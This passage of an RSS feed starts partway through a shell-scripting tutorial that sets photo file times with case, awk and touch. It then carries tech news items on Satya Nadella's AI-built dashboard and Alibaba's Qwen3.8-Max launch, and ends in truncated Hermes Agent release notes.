The script ran over all the files in less than 15 seconds and correctly set the file time on each. Job done, right? Well, after I did this, it struck me that there was room for improvement. The script would probably run more quickly if I used <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_09_04_05" rel="noopener noreferrer" target="_blank">
a </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_09_04_05" rel="noopener noreferrer" target="_blank">
case</a>

</code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_09_04_05" rel="noopener noreferrer" target="_blank">
 construct</a>
 instead of an <code>
if</code>
 construct that called <code>
grep</code>
 multiple times. While the pattern-matching notation used with <code>
case</code>
 is not as flexible and can handle fewer situations than the regular expression syntax available with <code>
grep</code>
, in this case (see what I did there?) it is sufficient. Testing it out, using <code>
case</code>
 reduced the running time by 45%.</p>

<p>

<em>
Replacing </em>

<code>

<em>
if</em>

</code>

<em>
 with </em>

<code>

<em>
case</em>

</code>

<em>
—the commands to be executed for each category of filename can remain exactly the same.</em>

</p>

<pre data-language="plain">
for fn in *
do
  case "$fn" in
  *BURST*)
    printf "$fn "
    echo $fn | cut -c '21-34' | sed 's/..$/.&amp;/'
  ;;
  IMG_*|VID_*)
    printf "$fn "
    echo $fn | cut -c '5-12,14-19' | sed 's/..$/.&amp;/'
  ;;
  *)
    printf "$fn "
    echo $fn | cut -c '1-8,10-15' | sed 's/..$/.&amp;/'
  esac
done

for fn in *
do
  case "$fn" in
  *BURST*)
    touch -c -t "$(echo $fn | cut -c '21-34' | sed 's/..$/.&amp;/')" "$fn"
  ;;
  IMG_*|VID_*)
    touch -c -t "$(echo $fn | cut -c '5-12,14-19' | sed 's/..$/.&amp;/')" "$fn"
  ;;
  *)
    touch -c -t "$(echo $fn | cut -c '1-8,10-15' | sed 's/..$/.&amp;/')" "$fn"
  esac
done
</pre>

<p>
I couldn't completely put <code>
awk</code>
 out of my mind, though, and I eventually came up with an <code>
awk</code>
 script for the same purpose. This is <em>
far</em>
 faster, probably because everything can be done within <code>
awk</code>
 except actually modifying the file times, which is possible using <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/awk.html#tag_20_06_13_14" rel="noopener noreferrer" target="_blank">
the </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/awk.html#tag_20_06_13_14" rel="noopener noreferrer" target="_blank">
system()</a>

</code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/awk.html#tag_20_06_13_14" rel="noopener noreferrer" target="_blank">
 function</a>
 to call <code>
touch</code>
. I was able to knock 90% off the running time, which for 800 files isn't a big deal but might make a difference if you have hundreds of thousands of files.</p>

<p>

<em>
The </em>

<code>

<em>
awk</em>

</code>

<em>
 counterparts to both scripts above. Unlike those, </em>

<code>

<em>
ls</em>

</code>

<em>
 is used to feed it with the list of filenames. We have the full power of extended regular expressions available to use for matching against the filenames. The </em>

<code>

<em>
next</em>

</code>

<em>
 statement causes </em>

<code>

<em>
awk</em>

</code>

<em>
 to skip any remaining pattern-action pairs and go to the next line of input.</em>

</p>

<pre data-language="plain">
ls | awk '/BURST/ { print $0, substr($0, 21, 12) "." substr($0, 33, 2)
  next }
/^(IMG_|VID_)/ {
  print $0, substr($0, 5, 8) substr($0, 14, 4) "." substr($0, 18, 2)
  next }
{ print $0, substr($0, 1, 8) substr($0, 10, 4) "." substr($0, 14, 2) }'

ls | awk '/BURST/ {
  system("touch -c -t " substr($0, 21, 12) "." substr($0, 33, 2) " " $0)
  next }
/^(IMG_|VID_)/ {
  system("touch -c -t " substr($0, 5, 8) substr($0, 14, 4) "." \
    substr($0, 18, 2) " " $0)
  next }
{ system("touch -c -t " substr($0, 1, 8) substr($0, 10, 4) "." \
    substr($0, 14, 2) " " $0) }'
</pre>

<p>
A further optimization that came to me later was to not call <code>
system()</code>
 from within <code>
awk</code>
, but to instead just have <code>
awk</code>
 print out a set of command lines. These can then be piped to <code>
sh</code>
 to actually be executed. This cut the running time down by 95% compared to my original script.</p>

<p>

<em>
The fastest version I was able to come up with. If you run it without the </em>

<code>

<em>
| sh</em>

</code>

<em>
 on the end, you can check that it's outputting the right information before actually modifying anything. The backslash on the end of a couple lines causes the subsequent line to be treated as a continuation of the existing line. Normally I would just keep everything on one line even if it runs longer than 80 columns, but for display purposes this looks nicer.</em>

</p>

<pre data-language="plain">
ls | awk '/BURST/ {
  print "touch -c -t " substr($0, 21, 12) "." substr($0, 33, 2) " " $0
  next }
/^(IMG_|VID_)/ {
  print "touch -c -t " substr($0, 5, 8) substr($0, 14, 4) "." \
    substr($0, 18, 2) " " $0
  next }
{ print "touch -c -t " substr($0, 1, 8) substr($0, 10, 4) "." \
    substr($0, 14, 2) " " $0 }' | sh
</pre>

<p>
It is probably true that this could have been carried out just as easily on Windows using Microsoft's PowerShell. I'm not very familiar with it, but would imagine (or hope) that it includes commands for managing these basic things like text manipulation and modifying file times. If you are stuck in an environment where you don't have a UNIX-like system available, investigate how to accomplish a task with the tools you do have.</p>

<p>
While I had the necessary information in the filenames to use, that might not be the case in all situations. You could look for other sources of dates—most digital cameras will add EXIF tags to a JPEG file giving the date and time it was created. (Hopefully, the clock in the camera will be set accurately.) While there is no standard UNIX utility to read those tags, free and open source software tools are widely available for that purpose. I found one called <code>
exiftags</code>
 that included the utility <code>
exiftime</code>
, which specifically outputs EXIF data relating to time. The output format was a little trickier to handle, but <code>
awk</code>
 was able to manage it with a little coaxing.</p>

<p>

<em>
Example of output produced by </em>

<code>

<em>
exiftime</em>

</code>

<em>
. Note that the first line with the filename is </em>
only<em>
 printed if more than one filename is given as an argument. Also, for </em>

<code>

<em>
amusing-sign.jpg</em>

</code>

<em>
, apparently I edited that photo after taking it and the editing software updated the "created" tag but left the others intact. Not all images will necessarily have created, generated, and digitized tags; we will just take whichever ones exist. I redirected standard error to </em>

<code>

<em>
/dev/null</em>

</code>

<em>
 to get rid of error messages for files that don't have EXIF tags; we'll handle those below.</em>

</p>

<pre data-language="plain">
$ exiftime *.jpg 2&gt;/dev/null
20260508_154743.jpg:
Image Created: 2026:05:08 15:47:43
Image Generated: 2026:05:08 15:47:43
Image Digitized: 2026:05:08 15:47:43

20260508_155044.jpg:
Image Created: 2026:05:08 15:50:44
Image Generated: 2026:05:08 15:50:44
Image Digitized: 2026:05:08 15:50:44

3704a78e771c2a25a894ef2f0b5a2a629f1eba80.jpg:

amusing-sign.jpg:
Image Created: 2017:01:24 23:14:04
Image Generated: 2017:01:24 21:18:07
Image Digitized: 2017:01:24 21:18:07

dscf3011.jpg:
Image Created: 2015:01:01 00:02:19
Image Generated: 2015:01:01 00:02:19
Image Digitized: 2015:01:01 00:02:19

window-view.jpg:
$ 
</pre>

<p>

<em>
We can take advantage of the fact that different records are separated by a blank line. In </em>

<code>

<em>
awk</em>

</code>

<em>
, when </em>

<code>

<em>
RS</em>

</code>

<em>
 is set to a null string and </em>

<code>

<em>
FS</em>

</code>

<em>
 is set to a newline character, each set of non-blank lines is treated as a record and each line within those sets is treated as a field. One or more blank lines separate each record. For the output of </em>

<code>

<em>
exiftime</em>

</code>

<em>
, this means that </em>

<code>

<em>
$1</em>

</code>

<em>
 will contain the filename and </em>

<code>

<em>
$2</em>

</code>

<em>
 will contain the first line after the filename. For those files without an EXIF date tag, </em>

<code>

<em>
$2</em>

</code>

<em>
 will be a null string, which is treated by </em>

<code>

<em>
awk</em>

</code>

<em>
 as FALSE, so the pattern will not match, the action will not be taken, and nothing will be printed. If a file has multiple tags, I will just use the first one reported by </em>

<code>

<em>
exiftime</em>

</code>

<em>
 (contained in </em>

<code>

<em>
$2</em>

</code>

<em>
). The </em>

<code>

<em>
sub()</em>

</code>

<em>
 function call removes the colon that </em>

<code>

<em>
exiftime</em>

</code>

<em>
 prints after the filename, and the </em>

<code>

<em>
gsub()</em>

</code>

<em>
 function call removes all non-numeric characters from the date and time in the tag. (After a comma within a </em>

<code>

<em>
print</em>

</code>

<em>
 statement, a backslash is not necessary to continue a line.) Also, this time I bothered to print quotation marks around the filename in case it contains spaces.</em>

</p>

<pre data-language="plain">
$ exiftime *.jpg 2&gt;/dev/null | awk 'BEGIN { FS = "\n" ; RS = "" }
$2 { sub(":$", "", $1)
  gsub("[^0-9]", "", $2)
  print "touch -c -t", substr($2, 1, 12) "." substr($2, 13, 2),
    "\"" $1 "\"" }'
touch -c -t 202605081547.43 "20260508_154743.jpg"
touch -c -t 202605081550.44 "20260508_155044.jpg"
touch -c -t 201701242314.04 "amusing-sign.jpg"
touch -c -t 201501010002.19 "dscf3011.jpg"
$ 
</pre>

<p>
I would imagine that there's some photo management program out there that I could have used to accomplish this. But then I would have had to locate it, verify that it wasn't some malware-loaded garbage, download, and install it. And chances are it would want to take over all the photos on my laptop. Instead, with standard UNIX tools and shell capabilities like <code>
if</code>
, <code>
case</code>
, process substitution, and pipelines, I was able to complete the task without having to install anything.</p>

<p>
The techniques I described can be used in different circumstances and with the output of different utilities. My intention was not just to explain how to solve this specific problem, but to hopefully teach you some things that you can apply in many situations. Perhaps if you use them to tackle a challenge of your own, you'll record an episode for HPR to share what you know.</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4697/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft CEO Touts His Own DIY AI Project To Wall Street and His 20 Million Followers]]></title>
<description><![CDATA[theodp writes: During Microsoft's 2026Q4 earnings call, CEO Microsoft Satya Nadella took time to tout a dashboard he personally created using AI from a Morgan Stanley analyst's PDF research report, which suggested a rosy payback for the so-called MAG7's ('Magnificent 7' companies) massive capital...]]></description>
<link>https://tsecurity.de/de/3701774/it-security-nachrichten/microsoft-ceo-touts-his-own-diy-ai-project-to-wall-street-and-his-20-million-followers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701774/it-security-nachrichten/microsoft-ceo-touts-his-own-diy-ai-project-to-wall-street-and-his-20-million-followers/</guid>
<pubDate>Tue, 04 Aug 2026 01:16:48 +0200</pubDate>
<content:encoded><![CDATA[theodp writes: During Microsoft's 2026Q4 earnings call, CEO Microsoft Satya Nadella took time to tout a dashboard he personally created using AI from a Morgan Stanley analyst's PDF research report, which suggested a rosy payback for the so-called MAG7's ('Magnificent 7' companies) massive capital expenditures on AI (to which Nadella later added a "not financial advice" disclaimer). "It would be fun for you, Adam. I think one of your colleagues put out an ROIC [Return on Invested Capital] document. I took that document to Copilot, which is a PDF, and I said, 'Build me a new Power BI dashboard, essentially.' But here is the thing. It built a rich semantic model that went into my Fabric with OneLake that brought all the data in from the external sources. In fact, it was current with all the SEC filings of all the MAG7. And then on top of that, the repo itself is in GitHub, but the artifact is sitting in my Copilot as a site. That, to me, is a classic example of an enterprise-wide workflow. I, as a knowledge worker, could go create a dashboard. The data engineer can go to Fabric and find the artifact. The professional developer can go to the repo and find it in GitHub. And by the way, it's all registered with Agent 365. That's a little bit of what Amy is describing as the coming together of a new way to work, even while at the same time, bringing IT, security and manageability of it."
 
After Nadella's show-and-tell drew an underwhelming response during the call ("That's very helpful. Thank you." said the Morgan Stanley analyst whose team's work Nadella scraped with AI), Nadella turned to social media with posts on LinkedIn (12M followers) and Twitter/X (8M followers) to make the case for why his DIY project was such a brilliant demonstration of how AI enables governance, controls, security, development, testing, deployment, maintenance, data analysis/modeling, visualization, usability, and value. "Some more detail on the ROIC Intelligence App I built yesterday and mentioned on today's earnings call," Nadella wrote on LinkedIn. "I took the PDF that Brian Nowak at Morgan Stanley put together for Hyperscale ROIC this week and used Copilot code (coming in our new superapp) with a single prompt + skill (/drill-me) to create the plan, then used autopilot in auto to create the full app (with history, lookups, scenarios, what-ifs, etc). And /rubber-duck to test. And the best part is that all the artifacts are in my enterprise environment. My app is in Copilot, my code is in GitHub Enterprise; all my data pipelines/lake/semantic models are in Fabric. And everything is under Agent 365 IT/Sec/FinOps control! So this is not about Tokenmaxxing or vibe coding. Every step of the way the rails are engineered to create value, making everything a long-term reusable asset, with governance/security, and cost controls. This is the full system to drive business value. Disclosures: This is all pulled from public sources, and for illustrative purposes only...not financial advice! :) Here is the app and architecture..."
 
Not unexpectedly, the accompanying screenshot of a splash page for the BI app and a buzzword-laden complicated architecture diagram drew universal praise from LinkedIn fans, but also a few barbs from less-than-impressed commenters on Nadella's Twitter/X post, some of whom suggested Nadella's project might even represent a jump-the-shark moment for AI mania. "That he doesn't see whats wrong with saying 'My app is in Copilot, my code is in GitHub Enterprise; all my data pipelines/lake/semantic models are in Fabric' is exactly why MS is failing at AI,'" replied @PassingPixels on X/Twitter. "Dude is having to run 5 different systems to emulate babies first vibe code." @zigmund_ignatov added, "Why do we call glorified slide show an app?" @Mathupiriyan quipped, "Looks like Copilot just turned a PDF into a profit crystal ball." Unimpressed, @Markusndnb remarked, "So you created a web page using tons of proprietary MS tools." And @FishyAccounting called on Nadella to show-his-work, saying "Post the prompt or it didn't happen." (btw, Microsoft President Brad Smith similarly declined to provide the prompt for his own self-described amazing AI DIY reporting project that he touted at Microsoft's Shareholder Meeting last December).
 
So, does Nadella's self-promoted AI reworking of someone else's PDF research report strike you as an amazing example of everything that's good about AI, or does it conjure up memories of The Emperor's New Clothes?<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Microsoft+CEO+Touts+His+Own+DIY+AI+Project+To+Wall+Street+and+His+20+Million+Followers%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F08%2F03%2F1934211%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F08%2F03%2F1934211%2Fmicrosoft-ceo-touts-his-own-diy-ai-project-to-wall-street-and-his-20-million-followers%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/08/03/1934211/microsoft-ceo-touts-his-own-diy-ai-project-to-wall-street-and-his-20-million-followers?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alibaba takes aim at OpenAI and Anthropic with Qwen3.8-Max launch]]></title>
<description><![CDATA[Alibaba on Monday introduced Qwen3.8-Max, its largest artificial intelligence model to date, expanding its enterprise AI portfolio with an open-weight model designed for software engineering, multimodal reasoning, and other knowledge-intensive business workloads.



In a blog post announcing the ...]]></description>
<link>https://tsecurity.de/de/3701643/ai-nachrichten/alibaba-takes-aim-at-openai-and-anthropic-with-qwen38-max-launch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701643/ai-nachrichten/alibaba-takes-aim-at-openai-and-anthropic-with-qwen38-max-launch/</guid>
<pubDate>Mon, 03 Aug 2026 20:24:27 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Alibaba on Monday introduced Qwen3.8-Max, its largest artificial intelligence model to date, expanding its enterprise AI portfolio with an open-weight model designed for software engineering, multimodal reasoning, and other knowledge-intensive business workloads.</p>



<p class="wp-block-paragraph">In a <a href="https://qwen.ai/blog?id=qwen3.8" target="_blank" rel="noreferrer noopener">blog post</a> announcing the launch, Alibaba described Qwen3.8-Max as a 2.4-trillion-parameter mixture-of-experts (MoE) model that activates only about 95 billion parameters during inference.</p>



<p class="wp-block-paragraph">The company said the architecture is intended to improve inference efficiency while supporting coding, reasoning and multimodal tasks, with open-weight versions scheduled for release next week through Alibaba Cloud’s Model Studio.</p>



<p class="wp-block-paragraph">“We believe it’s one of the most powerful model available today, compatible to leading frontier AI models, second only to Fable 5,” Alibaba said in an X <a href="https://x.com/Alibaba_Qwen/status/2078759124914098291" target="_blank" rel="noreferrer noopener">post</a>.</p>



<h2 class="wp-block-heading">Benchmarks target Anthropic and OpenAI’s coding models</h2>



<p class="wp-block-paragraph">Alibaba published internal test results comparing Qwen3.8-Max against Claude Opus 4.8, Claude Fable 5, and OpenAI’s GPT-5.6 Sol on coding benchmarks, including SWE-bench Pro and a proprietary evaluation the company calls NL2Repo-Bench.</p>



<p class="wp-block-paragraph">The company said it evaluated competing models using each vendor’s own coding harness, Claude Code for Anthropic’s models and Codex for GPT-5.6 Sol, and reported the highest published score across available configurations for each rival.</p>



<p class="wp-block-paragraph">Charlie Dai, vice president and principal analyst at Forrester, said the launch signals Alibaba is closing ground on proprietary leaders, though that isn’t the full picture.</p>



<p class="wp-block-paragraph">“Alibaba is narrowing the gap, but the larger story is the rapid maturation of open-weight models,” Dai said. “Enterprises increasingly have credible alternatives to proprietary frontier models, particularly for software engineering, domain customization, sovereignty, and cost-sensitive deployments, where openness often matters as much as absolute model performance.”</p>



<h2 class="wp-block-heading">Company touts a 16-day autonomous coding run</h2>



<p class="wp-block-paragraph">Alibaba said it tested the model on three unsupervised, multi-day coding projects requiring it to take a task from an empty project folder to completion without human assistance, including one project the company said took 16 days to complete on its own.</p>



<p class="wp-block-paragraph">Alibaba also highlighted enterprise applications across legal compliance, financial analysis, engineering design, quantitative research and multimodal content creation, saying the model is intended to complete entire business workflows rather than individual AI-assisted tasks.</p>



<p class="wp-block-paragraph">Amit Jena, development manager for AI at Kanerika, said that the claim deserves more scrutiny than it has received.</p>



<p class="wp-block-paragraph">“The claim worth examining is not the parameter count. Alibaba says the model completed a software engineering project in 16 days. That sentence has been reprinted everywhere and interrogated nowhere,” Jena said. “Sixteen days of what? How many times did a human step in? Did the output survive code review?”</p>



<p class="wp-block-paragraph">Jena said the open-weight commitment itself should also be read carefully. “Publishing weights is a separate act from opening an API endpoint,” he said. “Until there is a repository, a licence and a model card, open-weight describes an intention.”</p>



<h2 class="wp-block-heading">Analysts say inference efficiency isn’t the real constraint</h2>



<p class="wp-block-paragraph">Alibaba’s mixture-of-experts architecture activates roughly 95 billion of the model’s 2.4 trillion parameters per request, a design the company says lowers inference costs.</p>



<p class="wp-block-paragraph">Dai said that tradeoff now matters more to enterprise buyers than raw model size. “Inference efficiency now matters more than raw model size for most enterprises,” he said. “Activating only a fraction of total parameters can significantly reduce serving costs and infrastructure requirements, making frontier-class performance more accessible for production deployments where scalability, latency, and economics are often bigger concerns than benchmark leadership.”</p>



<p class="wp-block-paragraph">Jena said efficiency gains matter less than an organization’s ability to actually test the model. “Efficiency stopped being the interesting question. The constraint that actually binds is evaluation throughput,” he said.</p>



<p class="wp-block-paragraph">Nitish Tyagi, senior principal analyst at Gartner, said the significance of the release lies less in the parameter count than in what it signals about competitive pressure on AI deployment costs.</p>



<p class="wp-block-paragraph">“Gartner has previously predicted that, without stronger cost controls, AI coding expenses could exceed the average developer’s salary,” Tyagi said. “The combination of open weights, a mixture-of-experts architecture, and a one-million-token context window represents a meaningful step toward making AI-augmented software development more economically viable.”</p>



<p class="wp-block-paragraph">Tyagi cautioned that enterprises need to look beyond inference costs when weighing the model for production use.</p>



<p class="wp-block-paragraph">“Many organizations outside China may be hesitant to rely on models hosted within China, leading them to deploy through hyperscalers or on-premises infrastructure, both of which introduce additional costs,” he said.</p>



<p class="wp-block-paragraph">Open-weight models also typically lack the indemnification protections that come with commercial AI vendors, he said, meaning enterprises need their own security, governance, and code-scanning controls to catch copyright and intellectual property risks before production deployment.</p>



<h2 class="wp-block-heading">What CIOs should look out for</h2>



<p class="wp-block-paragraph">Jena said the flagship model announced Monday may not be the one enterprises end up running.</p>



<p class="wp-block-paragraph">“Qwen3.8-27B, announced alongside the flagship and almost entirely ignored in coverage,” is the more deployable option for most organizations, he said, since it can run on infrastructure they own and fine-tune on their own data.</p>



<p class="wp-block-paragraph">Dai said enterprise leaders evaluating the release should prioritize transparency and total cost of ownership over headline figures. “The key question is whether Qwen3.8 delivers measurable business outcomes, enterprise-grade reliability, lower total cost of ownership, and options for digital sovereignty compared with competing models,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Does MiniMax Agent Actually Make Work Easier?]]></title>
<description><![CDATA[Read about MiniMax's own architecture, and see how it runs a real task against the actual API. Learn the pieces of the MiniMax story that weren't covered in the launch post.]]></description>
<link>https://tsecurity.de/de/3701628/ai-nachrichten/does-minimax-agent-actually-make-work-easier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701628/ai-nachrichten/does-minimax-agent-actually-make-work-easier/</guid>
<pubDate>Mon, 03 Aug 2026 20:24:23 +0200</pubDate>
<content:encoded><![CDATA[Read about MiniMax's own architecture, and see how it runs a real task against the actual API. Learn the pieces of the MiniMax story that weren't covered in the launch post.]]></content:encoded>
</item>
<item>
<title><![CDATA[A Guide to Saving Token Usage with Multi-Agent AI]]></title>
<description><![CDATA[Scaling up and streamlining a multi-agent architecture doesn't necessarily entail escalated costs if you know how to properly implement these four strategies for saving token usage.]]></description>
<link>https://tsecurity.de/de/3701629/ai-nachrichten/a-guide-to-saving-token-usage-with-multi-agent-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701629/ai-nachrichten/a-guide-to-saving-token-usage-with-multi-agent-ai/</guid>
<pubDate>Mon, 03 Aug 2026 20:24:23 +0200</pubDate>
<content:encoded><![CDATA[Scaling up and streamlining a multi-agent architecture doesn't necessarily entail escalated costs if you know how to properly implement these four strategies for saving token usage.]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: Hermes Agent v0.20.0 (2026.8.3)]]></title>
<description><![CDATA[Hermes Agent v0.20.0 (v2026.8.3)
Release Date: August 3, 2026
Since v0.19.0: ~3,650 commits · ~1,400 merged PRs · ~5,200 files changed · ~559,000 insertions · ~405,000 deletions · ~1,200 issues closed · 650+ contributors

The Herald Release. Hermes is the herald of the gods, and this release make...]]></description>
<link>https://tsecurity.de/de/3701500/downloads/github-hermes-agent-v0200-202683/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701500/downloads/github-hermes-agent-v0200-202683/</guid>
<pubDate>Mon, 03 Aug 2026 20:21:56 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry">Hermes Agent v0.20.0 (v2026.8.3)
<p><strong>Release Date:</strong> August 3, 2026<br>
<strong>Since v0.19.0:</strong> ~3,650 commits · ~1,400 merged PRs · ~5,200 files changed · ~559,000 insertions · ~405,000 deletions · <strong>~1,200 issues closed</strong> · 650+ contributors</p>

<p><strong>The Herald Release.</strong> Hermes is the herald of the gods, and this release makes him one in earnest: he <strong>speaks</strong> (real-time conversational voice with streaming TTS, barge-in, on-device wake words, and hands-free control across the CLI, desktop, and every audio-capable gateway platform), he <strong>carries word to other agents</strong> (A2A v1.0), he <strong>announces events to your systems</strong> (signed outbound webhooks), and he <strong>cites his sources</strong> (grounded research with verifiable citations and fact-checking). Around that spine: the desktop app became a platform (artifacts with live preview, a plugin SDK, quick-entry from anywhere, multiple windows), the CLI got a wave of power commands (<code>!</code> shell mode, <code>/init</code>, <code>/diff</code>, <code>/context</code>, <code>/focus</code>), compression got smarter and gentler, and the tools themselves now recover from their own failures instead of making the model guess. This release rolls up everything from the v0.19.1 infrastructure patch tag — that window is fully documented here.</p>


<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Talk to Hermes — streaming, conversational voice with barge-in</strong> — Voice mode used to mean: speak, wait for the whole reply to generate, then listen to one long audio file. Now Hermes speaks clause-by-clause as the response streams, you can interrupt it mid-sentence by just talking (it stops, listens, and the model is told you cut in), and busy-aware silence detection means it doesn't talk over you. This works in CLI voice mode, on the desktop, and through gateway adapters. Talking to Hermes finally feels like a conversation, not a voicemail exchange. (<a href="https://github.com/NousResearch/hermes-agent/pull/69511" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69511/hovercard">#69511</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73862" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73862/hovercard">#73862</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74223" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74223/hovercard">#74223</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/74000" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/74000/hovercard">#74000</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/69602" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69602/hovercard">#69602</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Wake words and hands-free control</strong> — Say your own open-vocabulary wake phrase ("hey Hermes", or anything you pick) and Hermes starts listening — detection runs on-device, so no audio leaves your machine while it waits. Multi-profile voice routing means different wake words can reach different profiles, and saying "stop" ends the voice chat on every surface without touching the keyboard. Your terminal is now something you can talk to from across the room. (<a href="https://github.com/NousResearch/hermes-agent/pull/70509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/70509/hovercard">#70509</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73106" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73106/hovercard">#73106</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73933" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73933/hovercard">#73933</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Voice on every platform</strong> — Send a voice note to Hermes on WhatsApp, Feishu, DingTalk, LINE, QQ, Photon, or Weixin and it's transcribed and answered; auto-TTS replies are delivered platform-aware (opus where platforms want opus, captions attached correctly). STT is now fully configurable — its own <code>hermes tools</code> category, GUI toggles, dashboard dropdowns, unified language resolution so transcripts stop coming back in the wrong language, and OpenAI's gpt-transcribe support. One unified spoken-text preprocessor cleans markdown, code, and URLs out of speech across all TTS providers. (<a href="https://github.com/NousResearch/hermes-agent/pull/73515" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73515/hovercard">#73515</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73508/hovercard">#73508</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73910" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73910/hovercard">#73910</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73513" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73513/hovercard">#73513</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/73067" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/73067/hovercard">#73067</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Research you can trust — grounded citations with fact-checking</strong> — The new <code>grounded-citations</code> skill makes Hermes produce research where every claim is backed by a verifiable source: quotes are matched against the actual page text (not hallucinated), citations link to the exact evidence, and a fact-checking mode turns the same machinery on any document or claim you hand it — it tells you what checks out, what doesn't, and what couldn't be verified. If you use Hermes for research, this is the difference between "sounds right" and "provably sourced." (<a href="https://github.com/NousResearch/hermes-agent/pull/71698" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/71698/hovercard">#71698</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/77104" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/77104/hovercard">#77104</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Outbound webhooks — Hermes pushes events to your systems</strong> — Until now, integrating with Hermes meant polling or listening on a platform. Now Hermes pushes <strong>signed lifecycle events</strong> (session activity, turn completions, tool events) to any HTTP endpoint you register — with HMAC signatures so your receiver can verify authenticity. Wire Hermes into your CI, your home automation, your dashboards, or any service that speaks HTTP, with no polling loop. (<a href="https://github.com/NousResearch/hermes-agent/pull/69406" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/69406/hovercard">#69406</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
